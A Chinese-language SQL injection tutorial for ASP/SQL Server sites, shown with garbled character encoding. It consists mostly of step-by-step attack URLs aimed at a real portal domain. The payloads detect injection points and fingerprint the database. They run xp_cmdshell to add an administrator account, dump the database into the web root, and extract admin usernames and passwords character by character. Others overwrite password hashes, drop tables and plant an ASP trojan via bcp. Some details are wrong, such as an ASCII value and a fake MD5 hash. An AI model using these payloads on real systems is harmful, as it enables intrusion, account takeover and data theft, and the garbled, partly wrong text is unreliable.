引言
國(guó)家互聯(lián)網(wǎng)應(yīng)急中心CN-SA09-08號(hào)安全公告:8月11日�,CNCERT監(jiān)測(cè)發(fā)現(xiàn)國(guó)內(nèi)某三家大型門戶網(wǎng)站存在掛馬頁(yè)面。用戶在沒(méi)有做好系統(tǒng)防護(hù)的情況下訪問(wèn)相關(guān)頁(yè)面��,瀏覽器就會(huì)自動(dòng)下載惡意代碼在計(jì)算機(jī)上執(zhí)行�,這不僅可能造成用戶敏感數(shù)據(jù)失竊,也有可能形成大規(guī)模僵尸網(wǎng)絡(luò)���,嚴(yán)重威脅互聯(lián)網(wǎng)運(yùn)行安全���。截至8月12日12時(shí),部分網(wǎng)站的掛馬頁(yè)面仍然存在��。據(jù)CNNIC中國(guó)互聯(lián)網(wǎng)絡(luò)信息中心2009年7月16日發(fā)布的《第24次中國(guó)互聯(lián)網(wǎng)絡(luò)發(fā)展?fàn)顩r調(diào)查統(tǒng)計(jì)報(bào)告》中顯示�,我國(guó)共有網(wǎng)民數(shù)量3.38億人,網(wǎng)站數(shù)量306.1萬(wàn)個(gè),半年內(nèi)有1.95億網(wǎng)民在上網(wǎng)過(guò)程中遇到過(guò)病毒和木馬的攻擊�����,1.1億網(wǎng)民遇到過(guò)賬號(hào)或密碼被盜的問(wèn)題���。
圖1
sql注入
所謂SQL注入�,就是通過(guò)把SQL命令插入到Web表單遞交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串�����,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令�,比如先前的很多影視網(wǎng)站泄露VIP會(huì)員密碼大多就是通過(guò)WEB表單遞交查詢字符暴出的,這類表單特別容易受到SQL注入式攻擊.
當(dāng)應(yīng)用程序使用輸入內(nèi)容來(lái)構(gòu)造動(dòng)態(tài)sql語(yǔ)句以訪問(wèn)數(shù)據(jù)庫(kù)時(shí)���,會(huì)發(fā)生sql注入攻擊��。如果代碼使用存儲(chǔ)過(guò)程�����,而這些存儲(chǔ)過(guò)程作為包含未篩選的用戶輸入的字符串來(lái)傳遞�,也會(huì)發(fā)生sql注入���。sql注入可能導(dǎo)致攻擊者使用應(yīng)用程序登陸在數(shù)據(jù)庫(kù)中執(zhí)行命令��。如果應(yīng)用程序使用特權(quán)過(guò)高的帳戶連接到數(shù)據(jù)庫(kù)����,這種問(wèn)題會(huì)變得很嚴(yán)重。在某些表單中����,用戶輸入的內(nèi)容直接用來(lái)構(gòu)造(或者影響)動(dòng)態(tài)sql命令���,或者作為存儲(chǔ)過(guò)程的輸入?yún)?shù)����,這些表單特別容易受到sql注入的攻擊�����。而許多網(wǎng)站程序在編寫時(shí)�����,沒(méi)有對(duì)用戶輸入的合法性進(jìn)行判斷或者程序中本身的變量處理不當(dāng)�,使應(yīng)用程序存在安全隱患。這樣,用戶就可以提交一段數(shù)據(jù)庫(kù)查詢的代碼�����,根據(jù)程序返回的結(jié)果����,獲得一些敏感的信息或者控制整個(gè)服務(wù)器,于是sql注入就發(fā)生了���。
3.1 SQL注入思路與具體操作(以下敘述均使用asp代碼)
3.1.1 特點(diǎn)
一��、 SQL注入攻擊特點(diǎn)SQL注入是從正常的Web端口進(jìn)行訪問(wèn)���,表面上看跟一般的Web頁(yè)面訪問(wèn)沒(méi)有什么區(qū)別,它可以繞過(guò)普通防火墻的防范����,因此一旦網(wǎng)絡(luò)應(yīng)用程序有注入漏洞,攻擊者就可以直接訪問(wèn)數(shù)據(jù)庫(kù)進(jìn)而甚至能夠獲得數(shù)據(jù)庫(kù)所在的服務(wù)器的訪問(wèn)權(quán)����。SQL注入攻擊具有以下特點(diǎn):
1、廣泛性����。SQL注入攻擊利用的是SQL語(yǔ)法��,因此只要是利用SQL語(yǔ)法的Web應(yīng)用程序���,未對(duì)輸入的SQL語(yǔ)句做嚴(yán)格的處理都會(huì)存在SQL注入漏洞,目前以Active/Java ServerPages�����、PHP�����、Perl等技術(shù)與SQL Server�、Oracle��、DB2�、Sybase等數(shù)據(jù)庫(kù)相結(jié)合的Web應(yīng)用程序均發(fā)現(xiàn)存在SQL注入漏洞。
2���、技術(shù)難度不高��。SQL注入技術(shù)公布后��,網(wǎng)絡(luò)上先后出現(xiàn)了多款SQL注入工具��,例如教主的HDSI�、NBSI、啊D注入工具等����,利用這些工具軟件可以輕易地對(duì)存在SQL注入的網(wǎng)站或者Web應(yīng)用程序?qū)嵤┕簦⒆罱K獲取其計(jì)算機(jī)的控制權(quán)�����。
3��、危害性大��。在不經(jīng)授權(quán)的情況下操作數(shù)據(jù)庫(kù)中的數(shù)據(jù)�、惡意篡改網(wǎng)頁(yè)的內(nèi)容、篡改管理員權(quán)限�、網(wǎng)頁(yè)掛馬。
3.1.2注入思路
簡(jiǎn)單的說(shuō)可以歸為以下幾步:
1. SQL注入漏洞的判斷�,即尋找注入點(diǎn)
2. 判斷后臺(tái)數(shù)據(jù)庫(kù)類型
3. 確定XP_CMDSHELL可執(zhí)行情況;若當(dāng)前連接數(shù)據(jù)的賬號(hào)具有SA權(quán)限���, 且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過(guò)程(調(diào)用此存儲(chǔ)過(guò)程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行�,則整個(gè)計(jì)算機(jī)可以通過(guò)幾種方法完全控制,也就完成了整個(gè)注入過(guò)程��。否則繼續(xù):
4. 發(fā)現(xiàn)WEB虛擬目錄
5. 上傳ASP木馬����;
6. 得到管理員權(quán)限
圖2
3.1.3檢測(cè)注入漏洞的具體步驟
一、SQL注入漏洞的判斷 :
為了方便敘述���,以下以HTTP://www.163.com/news.asp?id=xx這個(gè)假想的地址為例進(jìn)行分析�����,xx可能是整型���,也有可能是字符串。
1����、整型參數(shù)的判斷
當(dāng)輸入的參數(shù)xx為整型時(shí)��,通常news.asp中SQL語(yǔ)句原貌大致如下:
select * from 表名 where 字段=xx����,所以可以用以下步驟測(cè)試SQL注入是否存在���。
最簡(jiǎn)單的判斷方法是:
HTTP://www.163.com/news.asp?id=xx’(附加一個(gè)單引號(hào)), 此時(shí)news.asp中的SQL語(yǔ)句變成了 select * from 表名 where 字段=xx’����, 如果程序沒(méi)有過(guò)濾好“’”(單引號(hào))的話 就會(huì)提示 news.asp運(yùn)行異常。
但這樣的方法雖然很簡(jiǎn)單��,但并不是最好的因?yàn)椴灰欢颗_(tái)服務(wù)器的IIS都返回具體錯(cuò)誤提示給客戶端����, 如果程序中加了cint(參數(shù))之類語(yǔ)句的話,SQL注入是不會(huì)成功的�����, 但服務(wù)器同樣會(huì)報(bào)錯(cuò)�����,具體提示信息為“處理 URL 時(shí)服務(wù)器上出錯(cuò)����。 請(qǐng)和系統(tǒng)管理員聯(lián)絡(luò)。”
同時(shí)�����,目前大多數(shù)程序員已經(jīng)將“’“ 過(guò)濾掉�,所以用” ’”測(cè)試不到注入點(diǎn) 。
因此一般使用經(jīng)典的1=1和1=2測(cè)試方法 ����,如下:
HTTP://www.163.com/news.asp?id=xx and 1=1, news.asp運(yùn)行正常,而且與HTTP://www.163.com/news.asp?id=xx運(yùn)行結(jié)果相同�,
但HTTP://www.163.com/news.asp?id=xx and 1=2, news.asp運(yùn)行異常;(這就是經(jīng)典的 1=1 1=2 判斷方法)���, 如果以上面滿足���,news.asp中就會(huì)存在SQL注入漏洞,反之則可能不能注入��。
二���、字符串型參數(shù)的判斷
方法與數(shù)值型參數(shù)判斷方法基本相同。當(dāng)輸入的參數(shù)xx為字符串時(shí)��,通常news.asp中SQL語(yǔ)句原貌大致如下:
select * from 表名 where 字段='xx'�����,所以可以用以下步驟測(cè)試SQL注入是否存在。
HTTP://www.163.com/news.asp?id=xx’(附加一個(gè)單引號(hào))�����,此時(shí)news.asp中的SQL語(yǔ)句變成了
select * from 表名 where 字段=xx’���,news.asp運(yùn)行異常����;
HTTP://www.163.com/news.asp?id=xx and '1'='1', news.asp運(yùn)行正常���,
而且與HTTP://www.163.com/news.asp?id=xx運(yùn)行結(jié)果相同����;
HTTP://www.163.com/news.asp?id=xx and '1'='2', news.asp運(yùn)行異常�����;
如果以上滿足����,則news.asp存在SQL注入漏洞�,反之則不能注入
三���、特殊情況的處理
有時(shí)ASP程序員會(huì)在程序員過(guò)濾掉單引號(hào)等字符�����,以防止SQL注入���。此時(shí)可以用以下幾種方法試一試:
1、大小定混合法:由于VBS并不區(qū)分大小寫���,而程序員在過(guò)濾時(shí)通常要么全部過(guò)濾大寫字符串��,要么全部過(guò)濾小寫字符串�,而大小寫混合往往會(huì) 被忽視�。如用SelecT代替select,SELECT等;
2�����、UNICODE法:在IIS中����,以UNICODE字符集實(shí)現(xiàn)國(guó)際化,我們完全可以IE中輸入的字符串化成UNICODE字符串進(jìn)行輸入�。如+ =%2B,空格=%20 等 �;URLEncode信息參見(jiàn)附件一;
3�、ASCII碼法:可以把輸入的部分或全部字符。
3.1.4 判斷數(shù)據(jù)庫(kù)類型
不同的數(shù)據(jù)庫(kù)的函數(shù)���、注入方法都是有差異的���,所以在注入之前,我們還要判斷一下數(shù)據(jù)庫(kù)的類型���。一般ASP最常搭配的數(shù)據(jù)庫(kù)是Access和 SQLServer�����,網(wǎng)上超過(guò)99%的網(wǎng)站都是其中之一�����。
怎么讓程序告訴你它使用的什么數(shù)據(jù)庫(kù)呢�����? SQLServer有一些系統(tǒng)變量���,如果服務(wù)器IIS提示沒(méi)關(guān)閉���,并且SQLServer返回錯(cuò)誤提示的話,那可以直接從出錯(cuò)信息獲取����,方法如下:
HTTP://www.163.com/news.asp?id=xx;and user>0
這句語(yǔ)句很簡(jiǎn)單,但卻包含了SQLServer特有注入方法的精髓先來(lái)分析其含義:首先���,前面的語(yǔ)句是正常的����,重點(diǎn)在and user>0����,我們知道,user是SQLServer的一個(gè)內(nèi)置變量�,它的值是當(dāng)前連接的用戶名,類型為 nvarchar�����。拿一個(gè) nvarchar的值跟int的數(shù)0比較,系統(tǒng)會(huì)先試圖將nvarchar的值轉(zhuǎn)成int型��,當(dāng)然����,轉(zhuǎn)的過(guò)程中肯定會(huì)出錯(cuò)���,SQLServer的出錯(cuò)提示是:“將nvarchar值 ”abc” 轉(zhuǎn)換數(shù)據(jù)類型為 int 的列時(shí)發(fā)生語(yǔ)法錯(cuò)誤”�����,但如果abc正是變量user的值�����,即一個(gè)用戶的賬號(hào)���,這樣不廢吹灰之力就拿到了數(shù)據(jù)庫(kù)的用戶名。
順便說(shuō)幾句�����,眾所周知,SQLServer的用戶sa是個(gè)等同Adminstrators權(quán)限 的角色��,拿到了sa權(quán)限���,幾乎肯定可以拿到主機(jī)的 Administrator了�����。上面的方法可以很方便的測(cè)試出是否是用sa登錄���,要注意的是:如果是 sa登錄,提示是將”dbo”轉(zhuǎn)換成int的列發(fā)生錯(cuò)誤����,而不是”sa”。 如果服務(wù)器IIS不允許返回錯(cuò)誤提示�,那怎么判斷數(shù)據(jù)庫(kù)類型呢?我們可以從Access和SQLServer和區(qū)別入手���,Access和 SQLServer都有自己的 系統(tǒng)表�,比如存放數(shù)據(jù)庫(kù)中所有對(duì)象的表���,Access是在系統(tǒng)表[msysobjects]中�����,但在Web環(huán)境下讀該表會(huì)提示“沒(méi)有權(quán)限”��,SQLServer是在表 [sysobjects]中�����,在Web環(huán)境下可正常讀取����。 在確認(rèn)可以注入的情況下�,使用下面的語(yǔ)句:
HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0
HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0
如果數(shù)據(jù)庫(kù)是SQLServer,那么第一個(gè)網(wǎng)址的頁(yè)面與原頁(yè)面HTTP://www.163.com/news.asp?id=xx是大致相同的����;而第二個(gè)網(wǎng)址,由于找不到表 msysobjects�,會(huì)提示出錯(cuò),就算程序有容錯(cuò)處理���,頁(yè)面也與原頁(yè)面完全不同�。 如果數(shù)據(jù)庫(kù)用的是Access���,那么情況就有所不同��,第一個(gè)網(wǎng)址的頁(yè)面與原頁(yè)面完全不同�;第二個(gè)網(wǎng)址,則視乎數(shù)據(jù)庫(kù)設(shè)置是否允許讀該系統(tǒng)表 ���,一般來(lái)說(shuō)是不允許的�����,所以與原網(wǎng)址也是完全不同�。大多數(shù)情況下�����,用第一個(gè)網(wǎng)址就可以得知系統(tǒng)所用的數(shù)據(jù)庫(kù)類型�,第二個(gè)網(wǎng)址只作為開(kāi) 啟IIS錯(cuò)誤提示時(shí)的驗(yàn)證。
3.1.5����、通過(guò)確定XP_CMDSHELL可執(zhí)行情況來(lái)獲得對(duì)服務(wù)器重要目錄的讀寫權(quán)限。
若當(dāng)前連接數(shù)據(jù)的賬號(hào)具有SA權(quán)限���, 且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過(guò)程 (調(diào)用此存儲(chǔ)過(guò)程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行���, 則整個(gè)計(jì)算機(jī)可以通過(guò)以下幾種方法完全控制�����,倘若沒(méi)有的話��,還需進(jìn)行以下步驟:
一���、HTTP://www.163.com/news.asp?id=xx and user>;0 news.asp執(zhí)行異常但可以得到當(dāng)前連接數(shù)據(jù)庫(kù)的用戶名(若顯示dbo則代表SA)。
二�、HTTP://www.163.com/news.asp?id=xx and db_name()>0 news.asp執(zhí)行異常但可以得到當(dāng)前連接的數(shù)據(jù)庫(kù)名。
三�、HTTP://www.163.com/news.asp?id=xx����;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數(shù)據(jù) 庫(kù);名中的分號(hào)表示SQL-SERVER執(zhí)行完分號(hào)前的語(yǔ)句名�,繼續(xù)執(zhí)行其后面的語(yǔ)句;“—”號(hào)是注解����,表示其后面的所有內(nèi)容僅為注釋,系統(tǒng)并 不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb。
四��、HTTP://www.163.com/news.asp?id=xx���;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加 的帳戶aaa加到administrators組中�����。
五����、HTTP://www.163.com/news.asp?id=xx����;backuup database 數(shù)據(jù)庫(kù)名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數(shù)據(jù)內(nèi)容 全部備份到WEB目錄下,再用HTTP把此文件下載(當(dāng)然首選要知道WEB虛擬目錄)�����。
六��、通過(guò)復(fù)制CMD創(chuàng)建UNICODE漏洞 HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便制造了一個(gè)UNICODE漏洞��,通過(guò)此漏洞的利用方法��,便完成了對(duì)整個(gè)計(jì)算機(jī)的控制(當(dāng)然首選要知道WEB虛擬 目錄)。 這樣就成功的完成了一次SQL注入攻擊���,不過(guò)在實(shí)踐的過(guò)程中也許會(huì)麻煩的多����。
當(dāng)上述條件不成立時(shí)就要繼續(xù)下面的步驟
七��、發(fā)現(xiàn)WEB虛擬目錄
只有找到WEB虛擬目錄�,才能確定放置ASP木馬的位置,進(jìn)而得到USER權(quán)限�。有兩種方法比較有效。 一是根據(jù)經(jīng)驗(yàn)猜解�,一般來(lái)說(shuō),WEB虛擬目錄是:c:\inetpub\wwwroot;
D:\inetpub\wwwroot; E:\inetpub\wwwroot等���,而可執(zhí)行虛擬目錄是: c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等�����。
八、是遍歷系統(tǒng)的目錄結(jié)構(gòu)�����,分析結(jié)果并發(fā)現(xiàn)WEB虛擬目錄; 先創(chuàng)建一個(gè)臨時(shí)表:temp
HTT P://www.163.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
九�����、我們可以通過(guò)以下三個(gè)方法來(lái)獲得瀏覽到所有的目錄(文件夾)列表的能力
1 我們可以利用xp_availablemedia來(lái)獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中:
HTTP://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--
我們可以通過(guò)查詢temp的內(nèi)容來(lái)獲得驅(qū)動(dòng)器列表及相關(guān)信息
2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹(shù)結(jié)構(gòu),并寸入temp表中:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
十�����、如果我們需要查看某個(gè)文件的內(nèi)容���,可以通過(guò)執(zhí)行xp_cmdsell:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
使用'bulk insert'語(yǔ)法可以將一個(gè)文本文件插入到一個(gè)臨時(shí)表中�。如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp文件的內(nèi)容了����!通過(guò)分析各種ASP文件,可以得到大量系統(tǒng)信息����,WEB建設(shè)與管理信息,甚至可以得到SA賬號(hào)的連接密碼���。
當(dāng)然�����,如果xp_cmshell能夠執(zhí)行�,我們可以用它來(lái)完成:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
通過(guò)xp_cmdshell我們可以看到所有想看到的,包括W3svc
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
但是�,如果不是SA權(quán)限,我們還可以使用
HTTP://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
十一��、在完成以上步驟的過(guò)程中����,入侵者也可以通過(guò)在輸入?yún)?shù)中構(gòu)建SQL語(yǔ)法還可以刪除數(shù)據(jù)庫(kù)中的表,查詢�、插入和更新數(shù)據(jù)庫(kù)中的數(shù)據(jù)等危險(xiǎn)操作:
1)jo′;drop table authors———如果存在authors表則刪除.
2)′union select sum(username)from users———從users表中查詢出username的個(gè)數(shù).
3)′���;insert into users values(666��,′attacker′�,′foobar′���,0xffff)———在user表中插入值.
4)′union select@@version��,1����,1����,1———查詢數(shù)據(jù)庫(kù)的版本.
5)′exec master..xp_cm dshell′dir′通過(guò)xp_cmdshell來(lái)執(zhí)行dir命令.
十二、注意:
1�����、以上每完成一項(xiàng)瀏覽后���,應(yīng)刪除TEMP中的所有內(nèi)容�,刪除方法是:
HTTP://www.163.com/news.asp?id=xx;delete from temp;--
2���、瀏覽TEMP表的方法是:(假設(shè)TestDB是當(dāng)前連接的數(shù)據(jù)庫(kù)名)
HTTP://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id字段的值���,并與
整數(shù)進(jìn)行比較,顯然news.asp工作異常����,但在異常中卻可以發(fā)現(xiàn)id字段的值。假設(shè)發(fā)現(xiàn)的表名是xyz�����,則
HTTP://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0 得到表TEMP中第二條 記錄id字段的值。
3.1.6上傳ASP木馬
所謂ASP木馬����,就是一段有特殊功能的ASP代碼,并放入WEB虛擬目錄的Scripts下���,遠(yuǎn)程客戶通過(guò)IE就可執(zhí)行它���,進(jìn)而得到系統(tǒng)的USER權(quán)限,實(shí)現(xiàn)對(duì)系統(tǒng)的初步控制����。上傳ASP木馬一般有兩種比較有效的方法:
一、利用WEB的遠(yuǎn)程管理功能
許多WEB站點(diǎn)��,為了維護(hù)的方便���,都提供了遠(yuǎn)程管理的功能�;也有不少WEB站點(diǎn)�,其內(nèi)容是對(duì)于不同的用戶有不同的訪問(wèn)權(quán)限。為了達(dá)到對(duì)用戶 權(quán)限的控制�����,都有一個(gè)網(wǎng)頁(yè),要求用戶名與密碼��,只有輸入了正確的值���,才能進(jìn)行下一步的操作,可以實(shí)現(xiàn)對(duì)WEB的管理,如上傳����、下載文件, 目錄瀏覽���、修改配置等��。 因此�����,若獲取正確的用戶名與密碼��,不僅可以上傳ASP木馬����,有時(shí)甚至能夠直接得到USER權(quán)限而瀏覽系統(tǒng)���,上一步的“發(fā)現(xiàn)WEB虛擬目錄”的復(fù)雜操作都可省略���。
用戶名及密碼一般存放在一張表中����,發(fā)現(xiàn)這張表并讀取其中內(nèi)容便解決了問(wèn)題���。以下給出兩種有效方法��。
1����、注入法:
從理論上說(shuō)�,認(rèn)證網(wǎng)頁(yè)中會(huì)有型如:
select * from admin where username='XXX' and password='YYY' 的語(yǔ)句,若在正式運(yùn)行此句之前��,沒(méi)有進(jìn)行必要的字符過(guò)濾��,則很容易實(shí) 施SQL注入���。 如在用戶名文本框內(nèi)輸入:abc’ or 1=1-- 在密碼框內(nèi)輸入:123 則SQL語(yǔ)句變成:
select * from admin where username='abc’ or 1=1 and password='123’ 不管用戶輸入任何用戶名與密碼�����,此語(yǔ)句永遠(yuǎn)都能正確執(zhí)行���, 用戶輕易騙過(guò)系統(tǒng)�����,獲取合法身份。
2����、猜解法:
基本思路是:猜解所有數(shù)據(jù)庫(kù)名稱,猜出庫(kù)中的每張表名����,分析可能是存放用戶名與密碼的表名,猜出表中的每個(gè)字段名��,猜出表中的每條記錄內(nèi)容�。
A、猜解所有數(shù)據(jù)庫(kù)名稱
HTTP://www.163.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因?yàn)?dbid 的值從1到5�����,是系統(tǒng)用了。所以用戶自己建的一定是從6開(kāi)始的�。并且我們提交了 name>1 (name字段是一個(gè)字符型的字段和數(shù)字比較會(huì)出
錯(cuò)),news.asp工作異常,可得到第一個(gè)數(shù)據(jù)庫(kù)名����,同理把DBID分別改成7,8,9,10,11,12…就可得到所有數(shù)據(jù)庫(kù)名����。 以下假設(shè)得到的數(shù)據(jù)庫(kù)名是TestDB。
B���、猜解數(shù)據(jù)庫(kù)中用戶名表的名稱
猜解法:此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜表名�,一般來(lái)說(shuō)���,
user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等�����。并通過(guò)語(yǔ)句進(jìn)行判斷
HTTP://www.163.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)>0 若表名存在�,則news.asp工作正常�,否則異常。如 此循環(huán)�,直到猜到系統(tǒng)賬號(hào)表的名稱���。
讀取法:SQL-SERVER有一個(gè)存放系統(tǒng)核心信息的表sysobjects,有關(guān)一個(gè)庫(kù)的所有表�����,視圖等信息全部存放在此表中����,而且此表可以通過(guò)WEB進(jìn)行訪問(wèn)。
當(dāng)xtype='U' and status>0代表是用戶建立的表����,發(fā)現(xiàn)并分析每一個(gè)用戶建立的表及名稱���,便可以得到用戶名表的名稱���,基本的實(shí)現(xiàn)方法是:
①HTTP://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0
得到第一個(gè)用戶建立表的名稱���,并與整數(shù)進(jìn)行比較��,顯然news.asp工作異常�,但在異常中卻可以發(fā)現(xiàn)表的名稱。假設(shè)發(fā)現(xiàn)的表名是xyz���,則
?、贖TTP://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and
name not in('xyz'))>0 可以得到第二個(gè)用戶建立的表的名稱�,同理就可得到所有用建立的表的名稱。
根據(jù)表的名稱����,一般可以認(rèn)定那張表用戶存放用戶名及密碼,以下假設(shè)此表名為Admin����。
C、猜解用戶名字段及密碼字段名稱
admin表中一定有一個(gè)用戶名字段���,也一定有一個(gè)密碼字段�,只有得到此兩個(gè)字段的名稱�����,才有可能得到此兩字段的內(nèi)容����。如何得到它們的名稱呢�����,同樣有以下兩種方法���。
猜解法:此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜字段名,一般來(lái)說(shuō)���,用戶名字段的名稱常用:username,name,user,account等�����。而密碼字段的名稱常用
?。簆assword,pass,pwd,passwd等���。并通過(guò)語(yǔ)句進(jìn)行判斷
HTTP://www.163.com/news.asp?id=xx and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”
語(yǔ)句得到表的行數(shù),所以若字段名存在����,則news.asp工作正常,否則異常��。如此循環(huán)���,直到猜到兩個(gè)字段的名稱�。
讀取法:基本的實(shí)現(xiàn)方法是
HTTP://www.163.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。
select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個(gè)字段名����,當(dāng)與整數(shù)進(jìn)行比較,顯然news.asp工作異常�,但在異常中卻可以發(fā)現(xiàn)字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5��,6…就可得到所有的字段名稱����。
D 猜解用戶名與密碼
猜用戶名與密碼的內(nèi)容最常用也是最有效的方法有:
ASCII碼逐字解碼法:雖然這種方法速度較慢,但肯定是可行的�。基本的思路是先猜出字段的長(zhǎng)度�����,然后依次猜出每一位的值�����。猜用戶名與猜密 碼的方法相同��,以下以猜用戶名為例說(shuō)明其過(guò)程。
HTTP://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2����,3,4,5���,… n�����,username
為用戶名字段的名稱��,admin為表的名稱)���,若x為某一值i且news.asp運(yùn)行正常時(shí),則i就是第一個(gè)用戶名的長(zhǎng)度�。如:當(dāng)輸入
HTTP://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時(shí)news.asp運(yùn)行正常,則第一個(gè)用戶名的長(zhǎng)度為8
HTTP://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長(zhǎng)度之間���,當(dāng)m=1,2,3�����,…時(shí)猜測(cè)分別猜測(cè)第1,2,3,…位的值;n的值是1~9�����、a~z����、A~Z的ASCII值,也就是1~128之間的任意值 �����;admin為系統(tǒng)用戶賬號(hào)表的名稱)�,若n為某一值i且news.asp運(yùn)行正常時(shí),則i對(duì)應(yīng)ASCII碼就是用戶名某一位值�。如:當(dāng)輸入
HTTP://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時(shí)news.asp運(yùn)行正常,則用戶名的第三位為P(P的ASCII為80)��;
HTTP://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時(shí)news.asp運(yùn)行正常�,則用戶名的第9位為!(!的ASCII為80);
猜到第一個(gè)用戶名及密碼后�����,同理����,可以猜出其他所有用戶名與密碼��。注意:有時(shí)得到的密碼可能是經(jīng)MD5等方式加密后的信息���,還需要用專用 工具進(jìn)行脫密?;蛘呦雀钠涿艽a,使用完后再改回來(lái)�,見(jiàn)下面說(shuō)明。簡(jiǎn)單法:猜用戶名用
HTTP://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1) , flag是admin表中的一個(gè)字段 ��,username是用戶名字段����,此時(shí)news.asp工作異常,但能得到Username的值���。與上同樣的方法��,可以得到第二用戶名���,第三個(gè)用戶等等,直到 表中的所有用戶名���。
猜用戶密碼:HTTP://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1) , flag是admin表中的一個(gè)字段�����,pwd是密碼字段���,此時(shí)news.asp工作異常,但能得到pwd的值����。與上同樣的方法,可以得到第二用戶名的密碼���,第三個(gè)用戶的密碼等等 �����,直到表中的所有用戶的密碼�。密碼有時(shí)是經(jīng)MD5加密的��,可以改密碼�。
HTTP://www.163.com/news.asp?id=xx;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的MD5值為 :AAABBBCCCDDDEEEF,即把密碼改成1;www為已知的用戶名)
用同樣的方法當(dāng)然可把密碼改原來(lái)的值�。
3.1.7、利用表內(nèi)容導(dǎo)成文件功能
SQL有BCP命令����,它可以把表的內(nèi)容導(dǎo)成文本文件并放到指定位置。利用這項(xiàng)功能�,我們可以先建一張臨時(shí)表,然后在表中一行一行地輸入一個(gè) ASP木馬��,然后用BCP命令導(dǎo)出形成ASP文件�����。命令行格式如下:
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar ('S'參數(shù)為執(zhí)行查詢的服務(wù)器�,'U'參數(shù)為用戶名,'P'參數(shù)為密碼���,最終上傳了一個(gè)163.asp的木馬)
3.1.8���、一些重要參數(shù)
識(shí)別SQL注入漏洞的常見(jiàn)字符
字符 和SQL關(guān)系
‘ 單引號(hào)。用來(lái)分割字符串值��。一個(gè)不匹配的引號(hào)會(huì)引起錯(cuò)誤
; 結(jié)束一個(gè)語(yǔ)句�。提前結(jié)束查詢會(huì)產(chǎn)生一個(gè)錯(cuò)誤
/* 注釋分割符���。注釋分割符內(nèi)的文字會(huì)被忽略
--%20 可以用來(lái)提前結(jié)束一個(gè)查詢
(和) 圓括號(hào)。用來(lái)作何邏輯子句��。不匹配的括號(hào)會(huì)產(chǎn)生一個(gè)錯(cuò)誤
a 如果用在書記比較中����,任何字母字符都可以產(chǎn)生一個(gè)錯(cuò)誤�。例如WHERE TaskID=1是合法的,因?yàn)門askID列是數(shù)字而1是數(shù)字����。但WHERE TaskID=1a是非法的,因?yàn)?a不是一個(gè)數(shù)字
常見(jiàn)數(shù)據(jù)庫(kù)錯(cuò)誤消息
平臺(tái) 錯(cuò)誤字符示例
